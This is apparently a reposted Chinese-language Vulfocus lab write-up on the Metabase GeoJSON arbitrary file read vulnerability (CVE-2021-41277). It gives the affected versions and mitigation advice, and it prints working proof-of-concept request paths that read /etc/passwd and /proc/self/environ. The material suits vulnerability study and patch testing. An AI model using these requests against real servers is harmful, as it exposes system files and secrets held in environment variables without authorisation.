Vulfocus靶场 | Metabase geojson任意文件读取漏洞(CVE-2021-41277)
作者:互联网
漏洞描述
etabase 是一个开源数据分析平台。在受影响的版本中,已发现自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)支持和潜在的本地文件包含(包括环境变量)存在安全问题。URL 在加载之前未经过验证。此问题已在新的维护版本(0.40.5 和 1.40.5)以及之后的任何后续版本中得到修复。如果您无法立即升级,您可以通过在反向代理或负载均衡器或 WAF 中包含规则以在应用程序之前提供验证过滤器来缓解这种情况。
影响版本
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
漏洞复现
poc:/api/geojson?url=file:/etc/passwd
flag:
/api/geojson?url=file:///proc/self/environ
标签:Metabase,file,Vulfocus,41277,geojson,漏洞,maps,版本,0.40 来源: https://www.cnblogs.com/mlxwl/p/16608967.html